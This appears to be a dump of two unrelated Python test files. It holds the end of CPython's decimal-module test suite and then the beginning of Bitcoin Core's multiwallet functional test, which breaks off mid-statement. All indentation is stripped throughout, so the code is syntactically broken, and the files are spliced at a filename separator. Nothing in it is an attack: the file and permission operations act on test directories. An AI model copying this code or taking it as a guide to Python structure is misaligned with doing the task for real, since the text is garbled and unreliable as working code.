# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
InvalidOperation: C.DecIEEEInvalidOperation
}
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
# procedure insures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
else:
